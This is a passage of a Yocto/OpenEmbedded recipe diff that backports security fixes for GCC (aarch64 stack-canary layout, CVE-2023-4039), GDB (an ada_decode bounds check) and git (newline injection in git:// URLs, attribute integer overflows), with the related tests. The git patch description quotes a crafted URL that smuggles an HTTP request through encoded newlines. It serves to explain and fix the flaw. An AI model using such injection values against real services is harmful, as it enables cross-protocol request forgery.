+ ** str x30, \[sp\]
++** ...
+ ** sub sp, sp, #4064
+-** str xzr, \[sp\]
++** str xzr, \[sp, #?1024\]
+ ** cbnz w0, .*
+ ** bl g
+ ** ...
+@@ -49,8 +50,9 @@ int test1(int z) {
+ ** test2:
+ ** ...
+ ** str x30, \[sp\]
++** ...
+ ** sub sp, sp, #1040
+-** str xzr, \[sp\]
++** str xzr, \[sp, #?1024\]
+ ** cbnz w0, .*
+ ** bl g
+ ** ...
+@@ -77,6 +79,7 @@ int test2(int z) {
+ ** test3:
+ ** ...
+ ** str x30, \[sp\]
++** ...
+ ** sub sp, sp, #1024
+ ** cbnz w0, .*
+ ** bl g
+--
+2.34.1
+
+
+From bf3eeaa0182a92987570d9c787bd45079eebf528 Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Thu, 15 Jun 2023 19:16:52 +0100
+Subject: [PATCH 10/10] aarch64: Make stack smash canary protect saved
+ registers
+
+AArch64 normally puts the saved registers near the bottom of the frame,
+immediately above any dynamic allocations. But this means that a
+stack-smash attack on those dynamic allocations could overwrite the
+saved registers without needing to reach as far as the stack smash
+canary.
+
+The same thing could also happen for variable-sized arguments that are
+passed by value, since those are allocated before a call and popped on
+return.
+
+This patch avoids that by putting the locals (and thus the canary) below
+the saved registers when stack smash protection is active.
+
+The patch fixes CVE-2023-4039.
+
+gcc/
+ * config/aarch64/aarch64.c (aarch64_save_regs_above_locals_p):
+ New function.
+ (aarch64_layout_frame): Use it to decide whether locals should
+ go above or below the saved registers.
+ (aarch64_expand_prologue): Update stack layout comment.
+ Emit a stack tie after the final adjustment.
+
+gcc/testsuite/
+ * gcc.target/aarch64/stack-protector-8.c: New test.
+ * gcc.target/aarch64/stack-protector-9.c: Likewise.
+---
+ gcc/config/aarch64/aarch64.c | 46 +++++++++++++--
+ .../gcc.target/aarch64/stack-protector-8.c | 58 +++++++++++++++++++
+ .../gcc.target/aarch64/stack-protector-9.c | 33 +++++++++++
+ 3 files changed, 133 insertions(+), 4 deletions(-)
+ create mode 100644 gcc/testsuite/gcc.target/aarch64/stack-protector-8.c
+ create mode 100644 gcc/testsuite/gcc.target/aarch64/stack-protector-9.c
+
+diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
+index 705f719a2ea..3d094214fac 100644
+--- a/gcc/config/aarch64/aarch64.c
++++ b/gcc/config/aarch64/aarch64.c
+@@ -4622,6 +4622,20 @@ aarch64_needs_frame_chain (void)
+ return aarch64_use_frame_pointer;
+ }
+
++/* Return true if the current function should save registers above
++ the locals area, rather than below it. */
++
++static bool
++aarch64_save_regs_above_locals_p ()
++{
++ /* When using stack smash protection, make sure that the canary slot
++ comes between the locals and the saved registers. Otherwise,
++ it would be possible for a carefully sized smash attack to change
++ the saved registers (particularly LR and FP) without reaching the
++ canary. */
++ return crtl->stack_protect_guard;
++}
++
+ /* Mark the registers that need to be saved by the callee and calculate
+ the size of the callee-saved registers area and frame record (both FP
+ and LR may be omitted). */
+@@ -4686,6 +4700,16 @@ aarch64_layout_frame (void)
+
+ cfun->machine->frame.bytes_below_hard_fp = crtl->outgoing_args_size;
+
++ bool regs_at_top_p = aarch64_save_regs_above_locals_p ();
++
++ if (regs_at_top_p)
++ {
++ cfun->machine->frame.bytes_below_hard_fp += get_frame_size ();
++ cfun->machine->frame.bytes_below_hard_fp
++ = aligned_upper_bound (cfun->machine->frame.bytes_below_hard_fp,
++ STACK_BOUNDARY / BITS_PER_UNIT);
++ }
++
+ #define ALLOCATE_GPR_SLOT(REGNO) \
+ do \
+ { \
+@@ -4758,9 +4782,11 @@ aarch64_layout_frame (void)
+ HOST_WIDE_INT varargs_and_saved_regs_size
+ = offset + cfun->machine->frame.saved_varargs_size;
+
++ cfun->machine->frame.bytes_above_hard_fp = varargs_and_saved_regs_size;
++ if (!regs_at_top_p)
++ cfun->machine->frame.bytes_above_hard_fp += get_frame_size ();
+ cfun->machine->frame.bytes_above_hard_fp
+- = aligned_upper_bound (varargs_and_saved_regs_size
+- + get_frame_size (),
++ = aligned_upper_bound (cfun->machine->frame.bytes_above_hard_fp,
+ STACK_BOUNDARY / BITS_PER_UNIT);
+
+ /* Both these values are already aligned. */
+@@ -4772,6 +4798,9 @@ aarch64_layout_frame (void)
+
+ cfun->machine->frame.bytes_above_locals
+ = cfun->machine->frame.saved_varargs_size;
++ if (regs_at_top_p)
++ cfun->machine->frame.bytes_above_locals
++ += cfun->machine->frame.saved_regs_size;
+
+ cfun->machine->frame.initial_adjust = 0;
+ cfun->machine->frame.final_adjust = 0;
+@@ -5764,10 +5793,10 @@ aarch64_add_cfa_expression (rtx_insn *insn, unsigned int reg,
+ | for register varargs |
+ | |
+ +-------------------------------+
+- | local variables | <-- frame_pointer_rtx
++ | local variables (1) | <-- frame_pointer_rtx
+ | |
+ +-------------------------------+
+- | padding | \
++ | padding (1) | \
+ +-------------------------------+ |
+ | callee-saved registers | | frame.saved_regs_size
+ +-------------------------------+ |
+@@ -5775,6 +5804,10 @@ aarch64_add_cfa_expression (rtx_insn *insn, unsigned int reg,
+ +-------------------------------+ |
+ | FP' | / <- hard_frame_pointer_rtx (aligned)
+ +-------------------------------+
++ | local variables (2) |
++ +-------------------------------+
++ | padding (2) |
++ +-------------------------------+
+ | dynamic allocation |
+ +-------------------------------+
+ | padding |
+@@ -5784,6 +5817,9 @@ aarch64_add_cfa_expression (rtx_insn *insn, unsigned int reg,
+ +-------------------------------+
+ | | <-- stack_pointer_rtx (aligned)
+
++ The regions marked (1) and (2) are mutually exclusive. (2) is used
++ when aarch64_save_regs_above_locals_p is true.
++
+ Dynamic stack allocations via alloca() decrease stack_pointer_rtx
+ but leave frame_pointer_rtx and hard_frame_pointer_rtx
+ unchanged.
+@@ -5937,6 +5973,8 @@ aarch64_expand_prologue (void)
+ that is assumed by the called. */
+ aarch64_allocate_and_probe_stack_space (tmp1_rtx, tmp0_rtx, final_adjust,
+ !frame_pointer_needed, true);
++ if (emit_frame_chain && maybe_ne (final_adjust, 0))
++ emit_insn (gen_stack_tie (stack_pointer_rtx, hard_frame_pointer_rtx));
+ }
+
+ /* Return TRUE if we can use a simple_return insn.
+diff --git a/gcc/testsuite/gcc.target/aarch64/stack-protector-8.c b/gcc/testsuite/gcc.target/aarch64/stack-protector-8.c
+new file mode 100644
+index 00000000000..c5e7deef6c1
+--- /dev/null
++++ b/gcc/testsuite/gcc.target/aarch64/stack-protector-8.c
+@@ -0,0 +1,58 @@
++/* { dg-options " -O -fstack-protector-strong -mstack-protector-guard=sysreg -mstack-protector-guard-reg=tpidr2_el0 -mstack-protector-guard-offset=16" } */
++/* { dg-final { check-function-bodies "**" "" } } */
++
++void g(void *);
++
++/*
++** test1:
++** sub sp, sp, #288
++** stp x29, x30, \[sp, #?272\]
++** add x29, sp, #?272
++** mrs (x[0-9]+), tpidr2_el0
++** ldr (x[0-9]+), \[\1, #?16\]
++** str \2, \[sp, #?264\]
++** mov \2, *0
++** add x0, sp, #?8
++** bl g
++** ...
++** mrs .*
++** ...
++** bne .*
++** ...
++** ldp x29, x30, \[sp, #?272\]
++** add sp, sp, #?288
++** ret
++** bl __stack_chk_fail
++*/
++int test1() {
++ int y[0x40];
++ g(y);
++ return 1;
++}
++
++/*
++** test2:
++** stp x29, x30, \[sp, #?-16\]!
++** mov x29, sp
++** sub sp, sp, #1040
++** mrs (x[0-9]+), tpidr2_el0
++** ldr (x[0-9]+), \[\1, #?16\]
++** str \2, \[sp, #?1032\]
++** mov \2, *0
++** add x0, sp, #?8
++** bl g
++** ...
++** mrs .*
++** ...
++** bne .*
++** ...
++** add sp, sp, #?1040
++** ldp x29, x30, \[sp\], #?16
++** ret
++** bl __stack_chk_fail
++*/
++int test2() {
++ int y[0x100];
++ g(y);
++ return 1;
++}
+diff --git a/gcc/testsuite/gcc.target/aarch64/stack-protector-9.c b/gcc/testsuite/gcc.target/aarch64/stack-protector-9.c
+new file mode 100644
+index 00000000000..58f322aa480
+--- /dev/null
++++ b/gcc/testsuite/gcc.target/aarch64/stack-protector-9.c
+@@ -0,0 +1,33 @@
++/* { dg-options "-O2 -mcpu=neoverse-v1 -fstack-protector-all" } */
++/* { dg-final { check-function-bodies "**" "" } } */
++
++/*
++** main:
++** ...
++** stp x29, x30, \[sp, #?-[0-9]+\]!
++** ...
++** sub sp, sp, #[0-9]+
++** ...
++** str x[0-9]+, \[x29, #?-8\]
++** ...
++*/
++int f(const char *);
++void g(void *);
++int main(int argc, char* argv[])
++{
++ int a;
++ int b;
++ char c[2+f(argv[1])];
++ int d[0x100];
++ char y;
++
++ y=42; a=4; b=10;
++ c[0] = 'h'; c[1] = '\0';
++
++ c[f(argv[2])] = '\0';
++
++ __builtin_printf("%d %d\n%s\n", a, b, c);
++ g(d);
++
++ return 0;
++}
+--
+2.34.1
+
diff --git a/meta/recipes-devtools/gcc/gcc-common.inc b/meta/recipes-devtools/gcc/gcc-common.inc
index 3dcfdf835f..69a3536965 100644
--- a/meta/recipes-devtools/gcc/gcc-common.inc
+++ b/meta/recipes-devtools/gcc/gcc-common.inc
@@ -1,5 +1,6 @@
SUMMARY = "GNU cc and gcc C compilers"
HOMEPAGE = "http://www.gnu.org/software/gcc/"
+DESCRIPTION = "The GNU Compiler Collection includes front ends for C, C++, Objective-C, Fortran, Ada, Go, and D, as well as libraries for these languages (libstdc++,...). GCC was originally written as the compiler for the GNU operating system."
SECTION = "devel"
LICENSE = "GPL"
@@ -99,7 +100,7 @@ BINV = "${PV}"
#S = "${WORKDIR}/gcc-${PV}"
S = "${TMPDIR}/work-shared/gcc-${PV}-${PR}/gcc-${PV}"
-B = "${WORKDIR}/gcc-${PV}/build.${HOST_SYS}.${TARGET_SYS}"
+B ?= "${WORKDIR}/gcc-${PV}/build.${HOST_SYS}.${TARGET_SYS}"
target_includedir ?= "${includedir}"
target_libdir ?= "${libdir}"
diff --git a/meta/recipes-devtools/gcc/gcc-cross-canadian_9.3.bb b/meta/recipes-devtools/gcc/gcc-cross-canadian_9.5.bb
index bf53c5cd78..bf53c5cd78 100644
--- a/meta/recipes-devtools/gcc/gcc-cross-canadian_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-cross-canadian_9.5.bb
diff --git a/meta/recipes-devtools/gcc/gcc-cross_9.3.bb b/meta/recipes-devtools/gcc/gcc-cross_9.5.bb
index b43cca0c52..b43cca0c52 100644
--- a/meta/recipes-devtools/gcc/gcc-cross_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-cross_9.5.bb
diff --git a/meta/recipes-devtools/gcc/gcc-crosssdk_9.3.bb b/meta/recipes-devtools/gcc/gcc-crosssdk_9.5.bb
index 40a6c4feff..40a6c4feff 100644
--- a/meta/recipes-devtools/gcc/gcc-crosssdk_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-crosssdk_9.5.bb
diff --git a/meta/recipes-devtools/gcc/gcc-runtime_9.3.bb b/meta/recipes-devtools/gcc/gcc-runtime_9.5.bb
index dd430b57eb..dd430b57eb 100644
--- a/meta/recipes-devtools/gcc/gcc-runtime_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-runtime_9.5.bb
diff --git a/meta/recipes-devtools/gcc/gcc-sanitizers_9.3.bb b/meta/recipes-devtools/gcc/gcc-sanitizers_9.5.bb
index f3c7058114..f3c7058114 100644
--- a/meta/recipes-devtools/gcc/gcc-sanitizers_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-sanitizers_9.5.bb
diff --git a/meta/recipes-devtools/gcc/gcc-shared-source.inc b/meta/recipes-devtools/gcc/gcc-shared-source.inc
index aac4b49313..4baf7874d2 100644
--- a/meta/recipes-devtools/gcc/gcc-shared-source.inc
+++ b/meta/recipes-devtools/gcc/gcc-shared-source.inc
@@ -9,3 +9,6 @@ SRC_URI = ""
do_configure[depends] += "gcc-source-${PV}:do_preconfigure"
do_populate_lic[depends] += "gcc-source-${PV}:do_unpack"
+
+# patch is available via gcc-source recipe
+CVE_CHECK_WHITELIST += "CVE-2023-4039"
diff --git a/meta/recipes-devtools/gcc/gcc-source.inc b/meta/recipes-devtools/gcc/gcc-source.inc
index 03bab97815..224b7778ef 100644
--- a/meta/recipes-devtools/gcc/gcc-source.inc
+++ b/meta/recipes-devtools/gcc/gcc-source.inc
@@ -18,6 +18,7 @@ INHIBIT_DEFAULT_DEPS = "1"
DEPENDS = ""
PACKAGES = ""
+B = "${WORKDIR}/build"
# This needs to be Python to avoid lots of shell variables becoming dependencies.
python do_preconfigure () {
diff --git a/meta/recipes-devtools/gcc/gcc-source_9.3.bb b/meta/recipes-devtools/gcc/gcc-source_9.5.bb
index b890fa33ea..b890fa33ea 100644
--- a/meta/recipes-devtools/gcc/gcc-source_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-source_9.5.bb
diff --git a/meta/recipes-devtools/gcc/gcc_9.3.bb b/meta/recipes-devtools/gcc/gcc_9.5.bb
index 7d93590588..7d93590588 100644
--- a/meta/recipes-devtools/gcc/gcc_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc_9.5.bb
diff --git a/meta/recipes-devtools/gcc/libgcc-initial_9.3.bb b/meta/recipes-devtools/gcc/libgcc-initial_9.5.bb
index 0c698c26ec..0c698c26ec 100644
--- a/meta/recipes-devtools/gcc/libgcc-initial_9.3.bb
+++ b/meta/recipes-devtools/gcc/libgcc-initial_9.5.bb
diff --git a/meta/recipes-devtools/gcc/libgcc_9.3.bb b/meta/recipes-devtools/gcc/libgcc_9.5.bb
index ea210a1130..ea210a1130 100644
--- a/meta/recipes-devtools/gcc/libgcc_9.3.bb
+++ b/meta/recipes-devtools/gcc/libgcc_9.5.bb
diff --git a/meta/recipes-devtools/gcc/libgfortran_9.3.bb b/meta/recipes-devtools/gcc/libgfortran_9.5.bb
index 71dd8b4bdc..71dd8b4bdc 100644
--- a/meta/recipes-devtools/gcc/libgfortran_9.3.bb
+++ b/meta/recipes-devtools/gcc/libgfortran_9.5.bb
diff --git a/meta/recipes-devtools/gdb/gdb-9.1.inc b/meta/recipes-devtools/gdb/gdb-9.1.inc
index d019e6b384..212c554cf1 100644
--- a/meta/recipes-devtools/gdb/gdb-9.1.inc
+++ b/meta/recipes-devtools/gdb/gdb-9.1.inc
@@ -16,6 +16,7 @@ SRC_URI = "${GNU_MIRROR}/gdb/gdb-${PV}.tar.xz \
file://0009-resolve-restrict-keyword-conflict.patch \
file://0010-Fix-invalid-sigprocmask-call.patch \
file://0011-gdbserver-ctrl-c-handling.patch \
+ file://0012-CVE-2023-39128.patch \
"
SRC_URI[md5sum] = "f7e9f6236c425097d9e5f18a6ac40655"
SRC_URI[sha256sum] = "699e0ec832fdd2f21c8266171ea5bf44024bd05164fdf064e4d10cc4cf0d1737"
diff --git a/meta/recipes-devtools/gdb/gdb-common.inc b/meta/recipes-devtools/gdb/gdb-common.inc
index 08f615addf..7a4793a73f 100644
--- a/meta/recipes-devtools/gdb/gdb-common.inc
+++ b/meta/recipes-devtools/gdb/gdb-common.inc
@@ -1,5 +1,6 @@
SUMMARY = "GNU debugger"
HOMEPAGE = "http://www.gnu.org/software/gdb/"
+DESCRIPTION = "GDB, the GNU Project debugger, allows you to see what is going on inside another program while it executes -- or what another program was doing at the moment it crashed."
SECTION = "devel"
DEPENDS = "expat zlib ncurses virtual/libiconv ${LTTNGUST} bison-native"
diff --git a/meta/recipes-devtools/gdb/gdb/0012-CVE-2023-39128.patch b/meta/recipes-devtools/gdb/gdb/0012-CVE-2023-39128.patch
new file mode 100644
index 0000000000..6445455bde
--- /dev/null
+++ b/meta/recipes-devtools/gdb/gdb/0012-CVE-2023-39128.patch
@@ -0,0 +1,75 @@
+From 033bc52bb6190393c8eed80925fa78cc35b40c6d Mon Sep 17 00:00:00 2001
+From: Tom Tromey <tromey@adacore.com>
+Date: Wed, 16 Aug 2023 11:29:19 -0600
+Subject: [PATCH] Avoid buffer overflow in ada_decode
+
+A bug report pointed out a buffer overflow in ada_decode, which Keith
+helpfully analyzed. ada_decode had a logic error when the input was
+all digits. While this isn't valid -- and would probably only appear
+in fuzzer tests -- it still should be handled properly.
+
+This patch adds a missing bounds check. Tested with the self-tests in
+an asan build.
+
+Bug: https://sourceware.org/bugzilla/show_bug.cgi?id=30639
+Reviewed-by: Keith Seitz <keiths@redhat.com>
+
+Upstream-Status: Backport from [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=033bc52bb6190393c8eed80925fa78cc35b40c6d]
+CVE: CVE-2023-39128
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ gdb/ada-lang.c | 19 ++++++++++++++++++-
+ 1 file changed, 18 insertions(+), 1 deletion(-)
+
+diff --git a/gdb/ada-lang.c b/gdb/ada-lang.c
+index 0c2d4fc..40852b6 100644
+--- a/gdb/ada-lang.c
++++ b/gdb/ada-lang.c
+@@ -56,6 +56,7 @@
+ #include "cli/cli-utils.h"
+ #include "gdbsupport/function-view.h"
+ #include "gdbsupport/byte-vector.h"
++#include "gdbsupport/selftest.h"
+ #include <algorithm>
+
+ /* Define whether or not the C operator '/' truncates towards zero for
+@@ -1184,7 +1185,7 @@ ada_decode (const char *encoded)
+ i -= 1;
+ if (i > 1 && encoded[i] == '_' && encoded[i - 1] == '_')
+ len0 = i - 1;
+- else if (encoded[i] == '$')
++ else if (i >= 0 && encoded[i] == '$')
+ len0 = i;
+ }
+
+@@ -1350,6 +1351,18 @@ Suppress:
+
+ }
+
++#ifdef GDB_SELF_TEST
++
++static void
++ada_decode_tests ()
++{
++ /* This isn't valid, but used to cause a crash. PR gdb/30639. The
++ result does not really matter very much. */
++ SELF_CHECK (ada_decode ("44") == "44");
++}
++
++#endif
++
+ /* Table for keeping permanent unique copies of decoded names. Once
+ allocated, names in this table are never released. While this is a
+ storage leak, it should not be significant unless there are massive
+@@ -14345,4 +14358,8 @@ DWARF attribute."),
+ gdb::observers::new_objfile.attach (ada_new_objfile_observer);
+ gdb::observers::free_objfile.attach (ada_free_objfile_observer);
+ gdb::observers::inferior_exit.attach (ada_inferior_exit);
++
++#ifdef GDB_SELF_TEST
++ selftests::register_test ("ada-decode", ada_decode_tests);
++#endif
+ }
+--
+2.24.4
+
diff --git a/meta/recipes-devtools/git/files/CVE-2021-40330.patch b/meta/recipes-devtools/git/files/CVE-2021-40330.patch
new file mode 100644
index 0000000000..725f98f0b7
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2021-40330.patch
@@ -0,0 +1,108 @@
+From e77ca0c7d577408878d2b3e8c7336e6119cb3931 Mon Sep 17 00:00:00 2001
+From: Minjae Kim <flowergom@gmail.com>
+Date: Thu, 25 Nov 2021 06:36:26 +0000
+Subject: [PATCH] git_connect_git(): forbid newlines in host and path
+
+When we connect to a git:// server, we send an initial request that
+looks something like:
+
+ 002dgit-upload-pack repo.git\0host=example.com
+
+If the repo path contains a newline, then it's included literally, and
+we get:
+
+ 002egit-upload-pack repo
+ .git\0host=example.com
+
+This works fine if you really do have a newline in your repository name;
+the server side uses the pktline framing to parse the string, not
+newlines. However, there are many _other_ protocols in the wild that do
+parse on newlines, such as HTTP. So a carefully constructed git:// URL
+can actually turn into a valid HTTP request. For example:
+
+ git://localhost:1234/%0d%0a%0d%0aGET%20/%20HTTP/1.1 %0d%0aHost:localhost%0d%0a%0d%0a
+
+becomes:
+
+ 0050git-upload-pack /
+ GET / HTTP/1.1
+ Host:localhost
+
+ host=localhost:1234
+
+on the wire. Again, this isn't a problem for a real Git server, but it
+does mean that feeding a malicious URL to Git (e.g., through a
+submodule) can cause it to make unexpected cross-protocol requests.
+Since repository names with newlines are presumably quite rare (and
+indeed, we already disallow them in git-over-http), let's just disallow
+them over this protocol.
+
+Hostnames could likewise inject a newline, but this is unlikely a
+problem in practice; we'd try resolving the hostname with a newline in
+it, which wouldn't work. Still, it doesn't hurt to err on the side of
+caution there, since we would not expect them to work in the first
+place.
+
+The ssh and local code paths are unaffected by this patch. In both cases
+we're trying to run upload-pack via a shell, and will quote the newline
+so that it makes it intact. An attacker can point an ssh url at an
+arbitrary port, of course, but unless there's an actual ssh server
+there, we'd never get as far as sending our shell command anyway. We
+_could_ similarly restrict newlines in those protocols out of caution,
+but there seems little benefit to doing so.
+
+The new test here is run alongside the git-daemon tests, which cover the
+same protocol, but it shouldn't actually contact the daemon at all. In
+theory we could make the test more robust by setting up an actual
+repository with a newline in it (so that our clone would succeed if our
+new check didn't kick in). But a repo directory with newline in it is
+likely not portable across all filesystems. Likewise, we could check
+git-daemon's log that it was not contacted at all, but we do not
+currently record the log (and anyway, it would make the test racy with
+the daemon's log write). We'll just check the client-side stderr to make
+sure we hit the expected code path.
+
+Reported-by: Harold Kim <h.kim@flatt.tech>
+Signed-off-by: Jeff King <peff@peff.net>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backported [https://github.com/git/git/commit/a02ea577174ab8ed18f847cf1693f213e0b9c473]
+CVE: CVE-2021-40330
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ connect.c | 2 ++
+ t/t5570-git-daemon.sh | 5 +++++
+ 2 files changed, 7 insertions(+)
+
+diff --git a/connect.c b/connect.c
+index b6451ab..929de9a 100644
+--- a/connect.c
++++ b/connect.c
+@@ -1064,6 +1064,8 @@ static struct child_process *git_connect_git(int fd[2], char *hostandport,
+ target_host = xstrdup(hostandport);
+
+ transport_check_allowed("git");
++ if (strchr(target_host, '\n') || strchr(path, '\n'))
++ die(_("newline is forbidden in git:// hosts and repo paths"));
+
+ /*
+ * These underlying connection commands die() if they
+diff --git a/t/t5570-git-daemon.sh b/t/t5570-git-daemon.sh
+index 34487bb..79cd218 100755
+--- a/t/t5570-git-daemon.sh
++++ b/t/t5570-git-daemon.sh
+@@ -103,6 +103,11 @@ test_expect_success 'fetch notices corrupt idx' '
+ )
+ '
+
++test_expect_success 'client refuses to ask for repo with newline' '
++ test_must_fail git clone "$GIT_DAEMON_URL/repo$LF.git" dst 2>stderr &&
++ test_i18ngrep newline.is.forbidden stderr
++'
++
+ test_remote_error()
+ {
+ do_export=YesPlease
+--
+2.17.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2022-23521.patch b/meta/recipes-devtools/git/files/CVE-2022-23521.patch
new file mode 100644
index 0000000000..974546013d
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-23521.patch
@@ -0,0 +1,367 @@
+From eb22e7dfa23da6bd9aed9bd1dad69e1e8e167d24 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:45:15 +0100
+Subject: [PATCH] CVE-2022-23521
+
+attr: fix overflow when upserting attribute with overly long name
+
+The function `git_attr_internal()` is called to upsert attributes into
+the global map. And while all callers pass a `size_t`, the function
+itself accepts an `int` as the attribute name's length. This can lead to
+an integer overflow in case the attribute name is longer than `INT_MAX`.
+
+Now this overflow seems harmless as the first thing we do is to call
+`attr_name_valid()`, and that function only succeeds in case all chars
+in the range of `namelen` match a certain small set of chars. We thus
+can't do an out-of-bounds read as NUL is not part of that set and all
+strings passed to this function are NUL-terminated. And furthermore, we
+wouldn't ever read past the current attribute name anyway due to the
+same reason. And if validation fails we will return early.
+
+On the other hand it feels fragile to rely on this behaviour, even more
+so given that we pass `namelen` to `FLEX_ALLOC_MEM()`. So let's instead
+just do the correct thing here and accept a `size_t` as line length.
+
+Upstream-Status: Backport [https://github.com/git/git/commit/eb22e7dfa23da6bd9aed9bd1dad69e1e8e167d24 &https://github.com/git/git/commit/8d0d48cf2157cfb914db1f53b3fe40785b86f3aa & https://github.com/git/git/commit/24557209500e6ed618f04a8795a111a0c491a29c & https://github.com/git/git/commit/34ace8bad02bb14ecc5b631f7e3daaa7a9bba7d9 & https://github.com/git/git/commit/447ac906e189535e77dcb1f4bbe3f1bc917d4c12 & https://github.com/git/git/commit/e1e12e97ac73ded85f7d000da1063a774b3cc14f & https://github.com/git/git/commit/a60a66e409c265b2944f18bf43581c146812586d & https://github.com/git/git/commit/d74b1fd54fdbc45966d12ea907dece11e072fb2b & https://github.com/git/git/commit/dfa6b32b5e599d97448337ed4fc18dd50c90758f & https://github.com/git/git/commit/3c50032ff5289cc45659f21949c8d09e52164579
+
+CVE: CVE-2022-23521
+
+Reviewed-by: Sylvain Beucler <beuc@debian.org>
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ attr.c | 97 +++++++++++++++++++++++++++----------------
+ attr.h | 12 ++++++
+ t/t0003-attributes.sh | 59 ++++++++++++++++++++++++++
+ 3 files changed, 132 insertions(+), 36 deletions(-)
+
+diff --git a/attr.c b/attr.c
+index 11f19b5..63484ab 100644
+--- a/attr.c
++++ b/attr.c
+@@ -29,7 +29,7 @@ static const char git_attr__unknown[] = "(builtin)unknown";
+ #endif
+
+ struct git_attr {
+- int attr_nr; /* unique attribute number */
++ unsigned int attr_nr; /* unique attribute number */
+ char name[FLEX_ARRAY]; /* attribute name */
+ };
+
+@@ -221,7 +221,7 @@ static void report_invalid_attr(const char *name, size_t len,
+ * dictionary. If no entry is found, create a new attribute and store it in
+ * the dictionary.
+ */
+-static const struct git_attr *git_attr_internal(const char *name, int namelen)
++static const struct git_attr *git_attr_internal(const char *name, size_t namelen)
+ {
+ struct git_attr *a;
+
+@@ -237,8 +237,8 @@ static const struct git_attr *git_attr_internal(const char *name, int namelen)
+ a->attr_nr = hashmap_get_size(&g_attr_hashmap.map);
+
+ attr_hashmap_add(&g_attr_hashmap, a->name, namelen, a);
+- assert(a->attr_nr ==
+- (hashmap_get_size(&g_attr_hashmap.map) - 1));
++ if (a->attr_nr != hashmap_get_size(&g_attr_hashmap.map) - 1)
++ die(_("unable to add additional attribute"));
+ }
+
+ hashmap_unlock(&g_attr_hashmap);
+@@ -283,7 +283,7 @@ struct match_attr {
+ const struct git_attr *attr;
+ } u;
+ char is_macro;
+- unsigned num_attr;
++ size_t num_attr;
+ struct attr_state state[FLEX_ARRAY];
+ };
+
+@@ -300,7 +300,7 @@ static const char *parse_attr(const char *src, int lineno, const char *cp,
+ struct attr_state *e)
+ {
+ const char *ep, *equals;
+- int len;
++ size_t len;
+
+ ep = cp + strcspn(cp, blank);
+ equals = strchr(cp, '=');
+@@ -344,8 +344,7 @@ static const char *parse_attr(const char *src, int lineno, const char *cp,
+ static struct match_attr *parse_attr_line(const char *line, const char *src,
+ int lineno, int macro_ok)
+ {
+- int namelen;
+- int num_attr, i;
++ size_t namelen, num_attr, i;
+ const char *cp, *name, *states;
+ struct match_attr *res = NULL;
+ int is_macro;
+@@ -356,6 +355,11 @@ static struct match_attr *parse_attr_line(const char *line, const char *src,
+ return NULL;
+ name = cp;
+
++ if (strlen(line) >= ATTR_MAX_LINE_LENGTH) {
++ warning(_("ignoring overly long attributes line %d"), lineno);
++ return NULL;
++ }
++
+ if (*cp == '"' && !unquote_c_style(&pattern, name, &states)) {
+ name = pattern.buf;
+ namelen = pattern.len;
+@@ -392,10 +396,9 @@ static struct match_attr *parse_attr_line(const char *line, const char *src,
+ goto fail_return;
+ }
+
+- res = xcalloc(1,
+- sizeof(*res) +
+- sizeof(struct attr_state) * num_attr +
+- (is_macro ? 0 : namelen + 1));
++ res = xcalloc(1, st_add3(sizeof(*res),
++ st_mult(sizeof(struct attr_state), num_attr),
++ is_macro ? 0 : namelen + 1));
+ if (is_macro) {
+ res->u.attr = git_attr_internal(name, namelen);
+ } else {
+@@ -458,11 +461,12 @@ struct attr_stack {
+
+ static void attr_stack_free(struct attr_stack *e)
+ {
+- int i;
++ unsigned i;
+ free(e->origin);
+ for (i = 0; i < e->num_matches; i++) {
+ struct match_attr *a = e->attrs[i];
+- int j;
++ size_t j;
++
+ for (j = 0; j < a->num_attr; j++) {
+ const char *setto = a->state[j].setto;
+ if (setto == ATTR__TRUE ||
+@@ -671,8 +675,8 @@ static void handle_attr_line(struct attr_stack *res,
+ a = parse_attr_line(line, src, lineno, macro_ok);
+ if (!a)
+ return;
+- ALLOC_GROW(res->attrs, res->num_matches + 1, res->alloc);
+- res->attrs[res->num_matches++] = a;
++ ALLOC_GROW_BY(res->attrs, res->num_matches, 1, res->alloc);
++ res->attrs[res->num_matches - 1] = a;
+ }
+
+ static struct attr_stack *read_attr_from_array(const char **list)
+@@ -711,21 +715,37 @@ void git_attr_set_direction(enum git_attr_direction new_direction)
+
+ static struct attr_stack *read_attr_from_file(const char *path, int macro_ok)
+ {
++ struct strbuf buf = STRBUF_INIT;
+ FILE *fp = fopen_or_warn(path, "r");
+ struct attr_stack *res;
+- char buf[2048];
+ int lineno = 0;
++ int fd;
++ struct stat st;
+
+ if (!fp)
+ return NULL;
+- res = xcalloc(1, sizeof(*res));
+- while (fgets(buf, sizeof(buf), fp)) {
+- char *bufp = buf;
+- if (!lineno)
+- skip_utf8_bom(&bufp, strlen(bufp));
+- handle_attr_line(res, bufp, path, ++lineno, macro_ok);
++
++ fd = fileno(fp);
++ if (fstat(fd, &st)) {
++ warning_errno(_("cannot fstat gitattributes file '%s'"), path);
++ fclose(fp);
++ return NULL;
+ }
++ if (st.st_size >= ATTR_MAX_FILE_SIZE) {
++ warning(_("ignoring overly large gitattributes file '%s'"), path);
++ fclose(fp);
++ return NULL;
++ }
++
++ CALLOC_ARRAY(res, 1);
++ while (strbuf_getline(&buf, fp) != EOF) {
++ if (!lineno && starts_with(buf.buf, utf8_bom))
++ strbuf_remove(&buf, 0, strlen(utf8_bom));
++ handle_attr_line(res, buf.buf, path, ++lineno, macro_ok);
++ }
++
+ fclose(fp);
++ strbuf_release(&buf);
